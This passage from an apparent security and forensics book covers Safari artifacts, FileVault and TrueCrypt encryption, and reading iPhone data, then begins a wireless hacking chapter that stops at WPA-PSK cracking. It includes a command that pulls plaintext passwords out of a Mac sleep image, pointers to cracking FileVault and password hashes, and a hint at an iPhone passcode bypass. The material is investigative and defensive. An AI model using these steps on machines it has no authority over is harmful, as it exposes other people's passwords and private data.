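As an added illustration of how an examiner triages a Cache.db table like the one shown above (this is example code written for this page, not from the book or from Apple): the script builds a constructed, in-memory SQLite stand-in whose blob columns are named after the screenshot's headers (response_object, request_object, proto_props, user_info; the table name cfurl_cache_blob_data is assumed), labels each blob by its leading bytes, lists the entries that hold image data, and finally shows the table emptied the way Empty Cache leaves it. Which column holds the cached body in a real Cache.db is not something the screenshot settles, so each constructed row simply carries one body-like blob.

```python
import sqlite3
from collections import Counter

# Leading bytes for the content kinds visible in the Cache.db screenshot.
SIGNATURES = [
    (b"<?xml", "xml"),
    (b"<!DOCTYPE htm", "html"),
    (b"GIF89a", "gif"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
]

# Blob column names as they appear in the screenshot's column headers.
BLOB_COLUMNS = ("response_object", "request_object", "proto_props", "user_info")


def classify_blob(blob):
    """Label a blob by its leading bytes; anything unrecognised is 'other'."""
    if blob is None:
        return "empty"
    for prefix, label in SIGNATURES:
        if blob.startswith(prefix):
            return label
    return "other"


def build_sample_cache_db():
    """Constructed stand-in for Cache.db (assumed table name, made-up rows):
    each row holds XML metadata in three columns and one body-like blob."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE cfurl_cache_blob_data ("
        "entry_ID INTEGER PRIMARY KEY, response_object BLOB, request_object BLOB, "
        "proto_props BLOB, user_info BLOB)"
    )
    xml = b'<?xml version="1.0" encoding="UTF-8"?><plist version="1.0"><dict/></plist>'
    bodies = [
        b"<!DOCTYPE html><html><body>constructed page</body></html>",
        b"GIF89a\x01\x00\x01\x00\x80\x00\x00",
        b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR",
    ]
    conn.executemany(
        "INSERT INTO cfurl_cache_blob_data VALUES (?, ?, ?, ?, ?)",
        [(i + 1, xml, xml, body, xml) for i, body in enumerate(bodies)],
    )
    conn.commit()
    return conn


def inventory(conn):
    """Count content kinds across every blob cell, the first pass an examiner
    makes before exporting pages or pictures from the cache."""
    counts = Counter()
    cols = ", ".join(BLOB_COLUMNS)
    for row in conn.execute(f"SELECT {cols} FROM cfurl_cache_blob_data"):
        for cell in row:
            counts[classify_blob(cell)] += 1
    return counts


def image_entries(conn):
    """entry_IDs whose blobs include image data (the JPEGs and PNGs of the
    cache folder as they look inside the database)."""
    ids = []
    cols = ", ".join(BLOB_COLUMNS)
    for row in conn.execute(f"SELECT entry_ID, {cols} FROM cfurl_cache_blob_data"):
        if any(classify_blob(cell) in ("gif", "png", "jpeg") for cell in row[1:]):
            ids.append(row[0])
    return ids


def empty_cache(conn):
    """Mimic what Empty Cache does to the live table: delete every row and
    return how many remain (0 once the cache has been emptied)."""
    conn.execute("DELETE FROM cfurl_cache_blob_data")
    conn.commit()
    return conn.execute("SELECT COUNT(*) FROM cfurl_cache_blob_data").fetchone()[0]


if __name__ == "__main__":
    db = build_sample_cache_db()
    print(dict(inventory(db)))
    print("entries with image data:", image_entries(db))
    print("rows after Empty Cache:", empty_cache(db))
```

Pointing the same three functions at a copied Cache.db (open it read-only and never the live one under ~/Library) gives the examiner a count of cached pages and images before any are exported, and a zero row count is what the emptied file above looks like from the query side.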


There are other artifacts that are left by Safari that could reveal your personal information, 
including 


■ Top sites plist 
■ Downloads plist 
■ History plist 
■ Files in cache, such as JPEGs 


The top sites plist will reveal a lot about an individual. 


[Screenshot: the Top Sites plist opened in Property List Editor: a TopSites array of 12 dictionary items, each carrying a TopSiteURLString (the first is Google's) and a DisplayTitle, alongside a BannedURLStrings array; a second view shows a 1,596-item array with per-site visitCount values.] 
The downloads plist will sometimes indicate whether the user has been naughty or nice. 


[Screenshot: the Downloads plist in Property List Editor: a DownloadHistory array of 20 dictionary items, each with keys such as DownloadEntryIdentifier, DownloadEntryPath (a file under ~/Downloads), DownloadEntryPostPath, DownloadEntryProgressBytesSoFar, DownloadEntryProgressTotalToLoad and DownloadEntryURL (here a Documents To Go download from dataviz.com).] 
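Reading the Downloads plist with a script rather than Property List Editor, as an added example (this is not code from the book): the plist below is a constructed sample that uses the key names visible in the screenshot (DownloadHistory, DownloadEntryIdentifier, DownloadEntryPath, DownloadEntryProgressBytesSoFar, DownloadEntryProgressTotalToLoad, DownloadEntryURL) with made-up example.com values. Python's plistlib reads the same XML plist format as the real file, which on Safari 5 I assume lives at ~/Library/Safari/Downloads.plist since the text only says "the user domain".

```python
import plistlib
from urllib.parse import urlsplit

# Constructed sample shaped like the Downloads plist above; every value is made up.
SAMPLE_DOWNLOADS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>DownloadHistory</key>
  <array>
    <dict>
      <key>DownloadEntryIdentifier</key>
      <string>00000000-0000-4000-8000-000000000001</string>
      <key>DownloadEntryPath</key>
      <string>~/Downloads/quarterly-report.pdf</string>
      <key>DownloadEntryProgressBytesSoFar</key>
      <integer>204800</integer>
      <key>DownloadEntryProgressTotalToLoad</key>
      <integer>204800</integer>
      <key>DownloadEntryURL</key>
      <string>http://www.example.com/files/quarterly-report.pdf</string>
    </dict>
    <dict>
      <key>DownloadEntryIdentifier</key>
      <string>00000000-0000-4000-8000-000000000002</string>
      <key>DownloadEntryPath</key>
      <string>~/Downloads/installer.dmg</string>
      <key>DownloadEntryProgressBytesSoFar</key>
      <integer>1048576</integer>
      <key>DownloadEntryProgressTotalToLoad</key>
      <integer>4194304</integer>
      <key>DownloadEntryURL</key>
      <string>http://downloads.example.org/installer.dmg</string>
    </dict>
  </array>
</dict>
</plist>
"""


def parse_downloads(plist_bytes):
    """Return one record per DownloadHistory entry. Missing keys become None
    rather than raising, so one damaged entry does not abort the whole parse."""
    data = plistlib.loads(plist_bytes)
    records = []
    for item in data.get("DownloadHistory", []):
        done = item.get("DownloadEntryProgressBytesSoFar")
        total = item.get("DownloadEntryProgressTotalToLoad")
        records.append({
            "id": item.get("DownloadEntryIdentifier"),
            "url": item.get("DownloadEntryURL"),
            "path": item.get("DownloadEntryPath"),
            "bytes": done,
            "total": total,
            # A download that never finished still leaves its URL and path behind.
            "complete": done is not None and total is not None and done >= total,
        })
    return records


def download_hosts(records):
    """Sorted, de-duplicated hosts the user downloaded from."""
    return sorted({urlsplit(r["url"]).hostname for r in records if r["url"]})


def incomplete(records):
    """Paths of downloads that stopped short of DownloadEntryProgressTotalToLoad."""
    return [r["path"] for r in records if not r["complete"]]


if __name__ == "__main__":
    recs = parse_downloads(SAMPLE_DOWNLOADS_PLIST)
    for r in recs:
        state = "done" if r["complete"] else "partial"
        print(f"{state:7} {r['bytes']:>9}/{r['total']:<9} {r['url']} -> {r['path']}")
    print("hosts:", download_hosts(recs))
```

The host list is the quick answer to "where has this user been fetching files from", and the incomplete list is worth a look because a file that is no longer on disk can still be recorded here with its full URL.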


Finally, a look at the cache reveals information about the user’s browsing session, including 
picture files. The Internet Cache is stored on Mac OS X to speed up the user’s browsing experience. 


[Screenshot: a file listing of the Safari cache folder, largely .jpeg image files with their sizes.] 


In order to protect your personal information, you have the ability to erase many of the arti- 
facts stored by Safari. The following is a list of items that a user can select to reset within Safari: 


■ History 
■ Top sites 
■ Web page previews 
■ Cache 
■ Download windows 
■ Cookies 
■ Website icons 
■ Names and passwords 
■ Autofill 


[Screenshot: the Reset Safari dialog: "Are you sure you want to reset Safari? Select the items you want to reset, and then click Reset. You can't undo this operation." The checkboxes are Clear history, Reset Top Sites, Remove all webpage preview images, Empty the cache, Clear the Downloads window, Remove all cookies, Remove all website icons, Remove saved names and passwords, Remove other AutoFill form text, Close all Safari windows, and Reset all location warnings, followed by Cancel and Reset buttons.] 


FileVault 


In order to prevent people from either using the boot DVD to reset your password or imaging your 
Mac with a live CD and reading your data, encryption software like FileVault or TrueCrypt can 
be utilized. Since FileVault comes with OS X, we will examine that first. 


To implement FileVault, 


1. Click on the blue apple in the top left-hand corner of the screen. 
2. Select System Preferences. 
3. Under the Personal category, select Security. 


[Screenshot: the System Preferences window, with Security selected in the Personal row.] 


4. Click Turn On FileVault. 
5. If a master password has not been set, it must be. 
6. Click Turn On FileVault. 


[Screenshot: the Security preference pane, FileVault tab: "FileVault secures your home folder by encrypting its contents. It automatically encrypts and decrypts your files while you're using them. WARNING: Your files will be encrypted using your login password. If you forget your login password and you don't know the master password, your data will be lost. A master password is set for this computer. This is a "safety net" password. It lets you unlock any FileVault account on this computer. FileVault protection is off for this account. Turning on FileVault may take a while."] 
7. Type your password to turn on FileVault. 


[Screenshot: the dialog "FileVault requires that you type the password for this user account," with a password field.] 


8. Check the Use secure erase button. 
9. Click Turn On FileVault. 


[Screenshot: the Security dialog: "You are now ready to turn on FileVault protection. WARNING: Your files will be encrypted using your login password. If you forget your login password and you don't know the master password, your information will be lost. Once you turn on FileVault, you will be logged out and FileVault will encrypt your entire home folder. Depending on how much information you have, this could take a while. You will not be able to log in or use this computer until the initial setup is completed. You can't log in to this account from another computer to use it for Windows file or printer sharing." with Use secure erase, Cancel and Turn On FileVault controls.] 


10. The system will indicate the Home folder is being encrypted. When finished, the operating 
system will return to the Logon screen. You need to log in again. 


[Screenshot: the FileVault progress window: "Encrypting kim's Home folder ... Creating FileVault..."] 


11. This process is transparent for the user; the only difference they may notice is the lock icon 
in front of their username that indicates FileVault Encryption. 


[Screenshot: a Finder window for the encrypted user's Pictures folder (8 items, 2.09 GB available).] 


FileVault Security Concerns 


In OS X everyone should be concerned with FileVault passwords. Obtaining the FileVault pass- 
word is possible. If the system is using OS X 10.5, by default the swap file and sleep image are not 
encrypted. However, in Snow Leopard, Apple fixed this vulnerability and made the sleep image 
and swap files encrypted. So if one encounters a Leopard system, there is a shortcut that 
investigators need to try first: 


1. The sleep and swap images reside in the /private/var/vm folder. The sleep image is created 
when the computer goes into hibernation mode in order to save battery life and is similar 
to the Windows hibernation file (hiberfil.sys). A wealth of information can be gleaned 
from the sleep image. Passwords for FileVault can (and emphasize can, not always) be found 
in the sleep image. Since everything is mostly plain text, a simple search can locate not only 
FileVault passwords, but a multitude of passwords. 

2. So how do we find them? Well, there are two ways. From the command line, create a grep 
expression that looks for text after “longname.” This will locate all usernames and passwords 
from the sleep image. Look at all the hits. The hits with the passwords will have the user- 
name followed by “password” and the actual password in plain text, for example: 
strings -8 /var/vm/sleepimage | grep -A 4 -i longname 

3. For Windows examiners, EnCase can be used to locate them as well. First, from the tree 
pane, navigate to and locate the sleep image. Blue check the sleep image and create a keyword 
for “longname.” Run the keyword search and limit the search to the single blue-checked 
sleep image. Look at all the hits. The hits with the passwords will have the user name fol- 
lowed by “password” and the actual password in plain text. 


If the passwords can't be located, then you are going to have to use some tools that can crack FileVault. 
There are a couple of tools that can assist in this. There is a tool available for law enforcement to 
retrieve this password. Individuals within LE can contact their forensic support person to get it. 
George Starcher has also created crowbarDMG. If passwords are not located in either the swap file 
or sleep image, there are three additional methods that can be used to crack FileVault: 


1. Crack the user's login passwords, located at /private/var/db/shadow/hash. 
2. Crack the key chains themselves. (The key chains are unencrypted except for the passwords 
themselves. Many items of interest can be located just by using strings.) 
3. Attack FileVault itself. 


One possible command line fix, to use with OS X v10.5.8, is: 


sudo pmset -a hibernatemode <number> 


Choose the number below based on the appropriate situation: 


0 No sleep image is used, and RAM contents are kept alive. 
1 Only sleep image is used, and RAM contents are purged. 
3 RAM is kept alive and a sleep image is used when power reaches critical levels. 
5 Only sleep image is used, but with secure virtual memory enabled. 
7 Both live RAM and sleep image are used, but with secure virtual memory enabled. 
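To check which of these modes a Leopard machine is actually in before trusting FileVault on it, here is an added example (written for this page, not from the book or from Apple) that pulls the hibernatemode line out of pmset -g output and grades it against the table above. The pmset -g text below is constructed and its layout is assumed; the mode-to-risk mapping comes straight from the table, and the "secure" counterpart of a mode (1 becomes 5, 3 becomes 7, that is, mode + 4) is an inference drawn from that table.

```python
import subprocess

# Mode table from the text above: (description, writes a sleep image, secure VM on).
HIBERNATE_MODES = {
    0: ("No sleep image is used, and RAM contents are kept alive.", False, False),
    1: ("Only sleep image is used, and RAM contents are purged.", True, False),
    3: ("RAM is kept alive and a sleep image is used when power reaches critical levels.", True, False),
    5: ("Only sleep image is used, but with secure virtual memory enabled.", True, True),
    7: ("Both live RAM and sleep image are used, but with secure virtual memory enabled.", True, True),
}

# Constructed 'pmset -g' output; the layout is assumed and the values are made up.
SAMPLE_PMSET_OUTPUT = """Active Profiles:
Battery Power\t\t-1
AC Power\t\t-1*
Currently in use:
 hibernatemode\t3
 hibernatefile\t/var/vm/sleepimage
 displaysleep\t10
 sleep\t\t10
 disksleep\t10
"""


def parse_hibernatemode(pmset_output):
    """Return the hibernatemode value from 'pmset -g' text, or None if absent."""
    for line in pmset_output.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "hibernatemode" and parts[1].isdigit():
            return int(parts[1])
    return None


def assess(mode):
    """(risk, explanation): 'high' when a sleep image is written without secure
    virtual memory, 'low' when no image is written or the image is encrypted."""
    if mode not in HIBERNATE_MODES:
        return ("unknown", f"hibernatemode {mode} is not in the table; check the pmset man page.")
    desc, writes_image, secure_vm = HIBERNATE_MODES[mode]
    if not writes_image:
        return ("low", desc + " Nothing is written to /private/var/vm at sleep.")
    if secure_vm:
        return ("low", desc + " The image is encrypted by secure virtual memory.")
    return ("high", desc + " The sleep image lands in /private/var/vm in plain text.")


def suggested_fix(mode):
    """The pmset command from the text for a 'high' mode, keeping its RAM
    behaviour and adding secure virtual memory (mode + 4 per the table: 1 -> 5,
    3 -> 7; this pairing is an inference from the table, not a documented rule)."""
    risk, _ = assess(mode)
    if risk != "high":
        return None
    return f"sudo pmset -a hibernatemode {mode + 4}"


def audit(pmset_output):
    """Bundle the three steps into one verdict for a given pmset -g dump."""
    mode = parse_hibernatemode(pmset_output)
    if mode is None:
        return {"mode": None, "risk": "unknown", "why": "no hibernatemode line found", "fix": None}
    risk, why = assess(mode)
    return {"mode": mode, "risk": risk, "why": why, "fix": suggested_fix(mode)}


def audit_live_system():
    """Run pmset -g on the machine itself (OS X only); falls back to 'unknown'."""
    try:
        out = subprocess.run(["pmset", "-g"], capture_output=True, text=True, check=False).stdout
    except OSError:
        out = ""
    return audit(out)


if __name__ == "__main__":
    print(audit(SAMPLE_PMSET_OUTPUT))
```

Modes 5 and 7 switch on secure virtual memory, which also covers the swap file the text mentions; modes 1 and 3 are the ones that leave the plain-text sleep image in /private/var/vm that the search in the previous section goes through, so a "high" verdict on a 10.5 box means FileVault alone is not protecting the login password.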


Apple did fix this and improved the security of OS X. Credit goes to Mr. Johnny Long, who origi- 
nally identified this vulnerability more than 4 years ago. 


TrueCrypt 


Since the dawn of computers, good and bad users have tried to hide their data. Today, there are 
many types of free and proprietary programs that can obfuscate the data that is stored on a hard 
drive. One of the most widely used programs is TrueCrypt. This is a cross-platform tool that is very 
robust. TrueCrypt can be downloaded for free from the following location: http://www.truecrypt. 
org/downloads. TrueCrypt can encrypt whole volumes, and USB drives can be encrypted using this tool. 
The installation is easy and the use can be easy or complicated depending on the skill of the user. 
Since encrypting the operating system was covered in Chapter 1, this section will focus on encrypt- 
ing a single file. Perform the following steps to create an encrypted container: 


1. Download TrueCrypt. 
2. Start the TrueCrypt application. 
3. From the TrueCrypt interface, select Create Volume. 


[Screenshot: the TrueCrypt main window, with the Create Volume, Volume Properties, Wipe Cache, Select File, Never save history, Volume Tools, Mount, Mount All Devices, Dismount All and Close controls.] 
4. A wizard will then appear that will guide the user in the creation of a volume. 


[Screenshot: the TrueCrypt Volume Creation Wizard, offering "Create an encrypted file container" (Creates a virtual encrypted disk within a file. Recommended for inexperienced users.) and "Create a volume within a partition/drive" (Formats and encrypts a non-system partition, entire external or secondary drive, entire USB stick, etc.).] 


There are two options: creating an encrypted container or a whole volume, such as a USB 
drive. Select Create an Encrypted File Container. This is a basic file that is commonly 
used. 


5. Next, a volume type is requested. There are two types. One is a single volume; the second is 
a hidden volume that gives an individual plausible deniability by having the option to give a 
password to the outer container while keeping the inner container secret. 


[Screenshot: the Volume Type page: "Standard TrueCrypt volume: Select this option if you want to create a normal TrueCrypt volume." and "Hidden TrueCrypt volume: It may happen that you are forced by somebody to reveal the password to an encrypted volume. There are many situations where you cannot refuse to reveal the password (for example, due to extortion). Using a so-called hidden volume allows you to solve such situations without revealing the password to your volume."] 


TrueCrypt volumes can be hidden within other TrueCrypt containers. This technique can 
be used so the user, under pressure, can reveal a password that gives access to one volume, 
but not the additional hidden volume within. 
[Diagram: a hidden container nested inside the outer container.] 

6. The next is the most important step: the user can call the container anything they wish and 
place it anywhere they want. For example, a container can be called hidden.txt or be named 
in similar fashion to a system file with a slight variation so it would look innocuous. 


[Screenshot: the Volume Location page of the TrueCrypt Volume Creation Wizard, with a Select File... button, a save sheet (Where: Documents; Format: All Files), and the note that existing files can be encrypted later on by moving them to the TrueCrypt container that you are about to create now.] 


7. Next the dialog box asks what type of encryption to utilize. There are eight different algo- 
rithms that can be used. 


[Screenshot: the Encryption Options page, listing algorithms such as Serpent-AES, Serpent-Twofish-AES and Twofish-Serpent, and a Hash Algorithm selector set to RIPEMD-160.] 
8. Next, the user can specify the size of the encrypted volume. The program also gives the avail- 
able space that can be used. 


[Screenshot: the Volume Size page: "Free space available: 92.6 GB. Please specify the size of the container to create. Note that the minimum possible size of a volume is 292 KB."] 


9. Next, the password for the volume can be generated by the user. 
Note: Key files can also be incorporated to give additional security. 


[Screenshot: the Volume Password page, with Password and Confirm password fields, Display password and Use keyfiles checkboxes, and the guidance: "It is very important that you choose a good password. You should avoid choosing one that contains only a single word that can be found in a dictionary (or a combination of 2, 3, or 4 such words). It should not contain any names or dates of birth. It should not be easy to guess. A good password is a random combination of upper and lower case letters, numbers, and special characters, such as @ ^ = $ * + etc. We recommend choosing a password consisting of more than 20 characters (the longer, the better). The maximum possible length is 64 characters."] 


10. The program will ask if this container will be used on different computers, which gives the 
container portability, and then will format the volume that it creates. 
11. The container is created and can be seen in the Finder. 


[Screenshot: a Finder window with the mounted volume (NO NAME) listed under Devices alongside Snow Leopard and iDisk.] 


After all data has been placed into the container, if the volume is ejected, the data is encrypted. 
To open the TrueCrypt containers: 


1. Start the TrueCrypt application. 
2. Click Select File and navigate to the TrueCrypt volume. 
3. Select Mount. 


[Screenshot: the TrueCrypt main window, with the Volume field set to /Users/crash1784/Documents/HIDDEN.TXT, Never save history checked, the Cache passwords and keyfiles in memory, Display password and Use keyfiles options, and the Mount, Mount All Devices, Dismount All and Close buttons.] 


4. Input the password and the volume will then be unencrypted. 
5. The volume will mount in the sidebar as was seen previously. 


There are other programs, such as Pretty Good Privacy (PGP), that now have support for Mac 
devices and can give the security of disk encryption. Encryption is a double-edged sword. It can help 
organizations that have a need for security, or it can hurt by hiding information that would be 
critical in judicial and civil matters. 


iPhone 


There is a new piece of software that will allow you to mount your iPhone, iPad, or iPod Touch 
as a hard disk. This software is called Phone Disk, and a 15-day trial is offered by the manufacturer. 


Note: iTunes 9 or higher must be installed prior to installing the software. 


To install Phone Disk, 


1. Download the software for Windows or Mac from macroplant.com/phonedisk/. 
2. Unzip the file. 

3. Double click on PhoneDiskSetup.exe. 

4. Click Next four times. 

5. Check the box that states Create a Desktop Icon and click Next. 
6. Click Install. 

7. Click I Agree. 

8. Click Install. 

9. Click Close. 
10. Click Finish. 
11. Launch the software then click Close. 
[Screenshot: the Welcome to Phone Disk window: "Phone Disk finally lets you have the control over the iPhone. This tiny program runs in the background of your computer and simply mounts the device into disk mode and can be controlled by the little icon in the bottom right corner of your screen. It works with any model iPhone or iPod Touch. Phone Disk comes with a free 15-day demo for you to try the software. If you like it, please buy a registration code to unlock the full version and help support further development of the program." with Buy Registration Code and Enter Registration Code buttons, the note that there are 15 days left before the Phone Disk demo expires, and a "Show this screen when Phone Disk starts" checkbox.] 


To use the software, 


1. Insert your iPhone. 
2. Right click on the yellow phone in the right-hand corner of your taskbar. 
3. Choose iPhone, Reveal In Explorer. 


[Screenshot: the Phone Disk tray menu, with Check for Updates..., Buy Registration Code and Enter Registration Code entries, and the Explorer window that opens.] 
By clicking on the DCIM folders, I can see the pictures. 


[Screenshot: Explorer showing the DCIM\100APPLE folder with image files such as IMG_0146.PNG and IMG_0150.PNG, and a folder of plist files (OnTheGoPlaylist.1.plist, Ringtones.plist) that Windows labels as QuickTime Preferences, 1 KB each.] 
An example of what one of the plist files looks like opened with WordPad (here, GeniusPlaylist.plist): 


<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> 
<plist version="1.0"> 
<dict> 
    <key>deleteWithoutSyncing</key> 
    <true/> 
    <key>playlistPersistentID</key> 
    <integer>-8913578096960576670</integer> 
</dict> 
</plist> 


Now here is the strange part about this software: 


■ If I put the iPhone into a system it has never been in before, it will not read the disk if there 
is a passcode. 

■ If I put it into a system it has been in before 
— It reads the disk with a changed passcode (without entering it). 
— It reads the disk even if the passcode was not set when I plugged it in previously. 


To protect your iPhone, iPad, or iPod Touch from a tool like Phone Disk, set a passcode: 


1. Select General from the Settings tab. 


[Screenshot: the iPhone Settings list (Notifications, Sounds, Brightness, Wallpaper, General, Mail, Contacts, Calendars) with General indicated.] 
2. Select Passcode Lock. 


[Screenshot: the General settings screen.] 


3. Select Turn Passcode On. 


[Screenshot: the Passcode Lock screen, with Turn Passcode On, Require Passcode (Immediately), Simple Passcode and Erase Data.] 


4. Set your passcode with a four-digit PIN. 
5. Reenter your four-digit passcode again so it can be verified. 


[Screenshot: the Set Passcode screen asking you to re-enter your passcode.] 


6. Change the AutoLock settings if necessary. 


[Screenshot: the Require Passcode screen, with the options Immediately (selected), After 1 minute, After 5 minutes, After 15 minutes, After 1 hour and After 4 hours, and the note "Shorter times are more secure".] 
7. The Immediately Require Passcode setting makes the iPhone even more secure. 
Note: An Erase Data setting will erase the phone’s data after 10 failed attempts to enter the 
passcode. 


[Screenshot: the Passcode Lock screen, with Turn Passcode Off, Change Passcode, Require Passcode: Immediately, Simple Passcode ON ("A simple passcode is a 4 digit number."), and Erase Data OFF ("Erase all data on this iPhone after 10 failed passcode attempts.").] 


8. The lock indicates that the iPhone will require a passcode to be accessed. 

9. Enter the passcode to get back into your iPhone, iPad, or iPod Touch. 
Note: Perform a search on Google for a passcode bypass on iPhone 4 using emergency call. 
It might be informative. 
[Screenshot: the locked iPhone's Emergency Call screen.] 


If someone tries to plug your iPhone into a system that it has never been plugged into before to 
try to read the data, it will not be successful. A “locked with a passcode” message will be displayed. 
You will need to enter the passcode to read the device with iTunes or Phone Disk. 


[Screenshot: the iTunes dialog: "iTunes could not connect to the iPhone "Iphone" because it is locked with a passcode. You must enter your passcode on the iPhone before it can be used with iTunes."] 

Summary 


Although Macs have always had a better reputation for security, that is likely due to two factors: 


■ Fewer people use them. 
■ Mac controls the hardware. 


Mac OS X has weaknesses that can be exploited, like the ability to reset the password using the 
install DVD. Like any other operating system, it is always a good idea to use encryption software 
like TrueCrypt or FileVault. TrueCrypt will protect more of the data on the drive since FileVault 
only encrypts a user's Home folder. FileVault is easier to implement because it is part of the Mac 
OS X operating system. With the popularity of a device like the iPhone, hackers will take the time 
to identify and develop exploits so they can harvest its owner's information. 


Chapter 14 


Wireless Hacking 


Introduction 


The advent of wireless communication technology has affected everyone in one form or another. 
Users have been able to take advantage of much greater convenience, system administrators and 
defenders have had to assume this additional responsibility, and hackers and researchers have been 
given a new playground to roam. Simply put, wireless connectivity has been a game changer. 

Whether defending or attacking, all aspects of the network system are affected when a wireless 
capability is introduced onto a network. This is because it adds yet another avenue for someone 
to try to exploit. The important thing to remember is that if someone is able to breach the Wi-Fi 
security in place, then they have internal access to the entire network. What this means is that 
once this phase is complete all other techniques and scenarios contained in this book can then be 
used against the systems on the network. 

Another important factor to keep in mind is that not only are the systems connected to the 
network in jeopardy, but also the communications that are traveling over that wireless medium. 
This is due to the fact that a wireless access point works at layer 2, which is where Media Access 
Control (MAC) addresses are being utilized. This makes this segment of the network act similar 
to a network where devices are connected to a hub. Therefore, the transmissions are capable of 
being seen by all those connected to the wireless network, unlike a switched network, where 
data destined for a specific client is sent to only that client. Thus, techniques such as Address 
Resolution Protocol (ARP) spoofing are not needed on a wireless network. 

In this chapter we will cover some of the weaknesses of the Wi-Fi technology and give real 
world examples of how these weaknesses can be used to expose other areas that may not be com- 
pletely obvious at first. The wireless connectivity arena is extremely large, so it’s impossible to cover 
every possibility or scenario in a single chapter. Therefore, the primary focus is going to be on the 
areas that affect most users. 

Please note, the information contained in this chapter will discuss technologies and methods 
that make it possible to break local, state, and/or federal laws. Legal aspects and implications will 
not be discussed. The reader assumes any and all responsibility for any testing or actions that come 
from the additional knowledge contained in this chapter. 
Wi-Fi Hardware and Software 


Before we can begin, it's important to understand what software and hardware will be used to inject 
and capture the wireless traffic. There are certain things to be aware of that may not be obvious to 
most people, so this is meant to try and help save some time and frustration. The primary pieces 
are the operating system, capture and analysis software, and the Wi-Fi capture device and drivers. 

The operating system will play a key role in determining what other hardware will be required. 
If a version of Microsoft Windows is going to be used, then an AirPcap adapter will be required. 
The AirPcap adapter allows a Windows machine to monitor and capture wireless traffic and has a 
price range from around $200 to $700, depending on functionality. This adapter is only used as 
a monitor device and cannot be used as an actual wireless network device. Therefore, it can't be 
used to actually connect to a wireless access point. When it comes to capturing network traffic, 
this is a positive thing. When capturing, you don't want your device to be able to send any type 
of traffic out of that device. 

My own personal preference is to use a distribution of Linux called BackTrack. BackTrack 
is a very useful and popular Linux security distribution that can be downloaded free of charge 
from www.backtrack-linux.org and is available as a bootable DVD ISO or preconfigured vir- 
tual machine (VM) appliance. It comes with all the necessary tools and utilities already 
installed to capture and analyze wireless traffic. A Wi-Fi capture device that is functional in 
BackTrack is the Alfa wireless adapter with the Realtek 8187 (RTL8187L) chipset, such as 
the Alfa AWUS036H 802.11 B/G USB wireless adapter. This wireless adapter is supported 
by BackTrack and costs around $20 to $40 depending on power levels. Another option may 
be the Alfa a/b/g/n AWUS050NH with the rt2800usb drivers. Many other Wi-Fi devices are 
supported, but be aware that you must always check to see what functionality is supported by 
those particular devices' drivers. Also, you need to consider what alternate device drivers exist 
that may support your device and the additional functionality those may have. Basically, not 
all Wi-Fi devices will have the same capabilities. On a positive note, the Wi-Fi security arena is 
very active. So, just because a particular device doesn’t have certain capabilities today doesn’t 
mean that someone isn’t developing support for it. The best thing to do is to check the 
www.aircrack-ng.com website for a list of the latest supported devices or the BackTrack forums for more 
information about getting your specific device working. 

The last thing we need is the software to capture and analyze the wireless traffic, such as 
airodump-ng from the aircrack-ng suite (aircrack-ng.org), and industry-leading network protocol 
analyzer Wireshark (wireshark.org). The aircrack-ng suite is a whole collection of tools geared 
towards all things Wi-Fi. Airodump-ng is one of the tools and is a command-line utility designed 
to capture wireless traffic. Wireshark is a powerful free application that is capable of analyzing 
network traffic and even capturing wireless traffic. Wireshark was created by Gerald Combs, who 
is still an active primary member of the project. Although Wireshark is an outstanding application, it has been my experience that airodump-ng is more reliable at capturing more Wi-Fi data than Wireshark. Therefore, I usually capture traffic with airodump-ng and then analyze that traffic with Wireshark. 


BackTrack Setup: Quick and Dirty 


We are going to discuss using BackTrack to perform a different operation in this chapter. 
Therefore, we need to quickly discuss getting BackTrack up and running, updated, and ready 
to go. It’s my strong opinion, for many, many reasons, that anyone who wants to consider themselves any type of security professional should have at least a basic comfort level of using Linux. This is one of those skills that a person doesn't realize they're missing until they actually have it. 

The first thing to do, if you don't already have the workstation version of VMware, is to download and install the free version of VMware Server at www.vmware.com. This will allow you to run the BackTrack VMware appliance. Next, download the latest BackTrack VMware appliance from www.backtrack-linux.org/downloads. After the download is finished, it’s recommended to go ahead and check that the md5 hash matches correctly to verify the download was successful and as intended. 

Next we are going to start and update BackTrack. Open the appliance in VMware. When the terminal prompt is displayed, type 


■ root (this is the default username) 
■ toor (this is the default password) 
■ startx (this will start the X Windows graphical user interface [GUI]) 


The next thing we are going to do is update the system. Open a terminal window and type the following: 


■ /etc/init.d/networking start (start the networking services) 
■ apt-get update (update the package list) 
■ apt-get upgrade (upgrade installed packages, select Y to confirm and continue) 


Now we have an updated functional operating system ready to do what's necessary to capture and 
analyze the Wi-Fi networks. If you are new to the Linux world, take some time to check out the 
available tools in the GUI menu, but also keep in mind that most of the utilities are executed from 
the terminal window. 


Monitor Mode 


One of the things to be aware of is called “monitor mode.” Typically, network devices only pay 
attention to the traffic that is directed at them. In the most simplistic form, by putting the device 
in monitor mode, it's told to pay attention to all traffic that it can see. From there, the traffic can 
be viewed live or redirected and saved out to a file. There have been updates to the aircrack-ng suite 
that makes it easier for the user. Some devices don't have to manually be put into monitor mode 
to be able to correctly function. 

The first thing to do is make sure the USB wireless device is connected to the computer and the BackTrack appliance is booted. Then make sure the device is connected to the VM by selecting VM » Removable Devices and making sure the device is checked. This is how to connect or disconnect devices from an appliance. 

Next open a terminal window and type airmon-ng. This will display any device connected to the system that is capable of being put into monitor mode; in this scenario it’s wlan0. As with many but not all Linux command-line utilities, to view the help syntax type airmon-ng -h. Use the airmon-ng command to enable monitor mode by typing airmon-ng start wlan0. Type airmon-ng again to verify it worked correctly. You should see an additional device called mon0, as shown here. 
Cracking WPA-PSK 


In this section we are going to walk through testing a Wi-Fi protected access pre-shared key 
(WPA-PSK) protected wireless network. One primary aspect to take away from this section is 
that it doesn't matter if the network is utilizing WPA or WPA2 encryption. The attack vector 
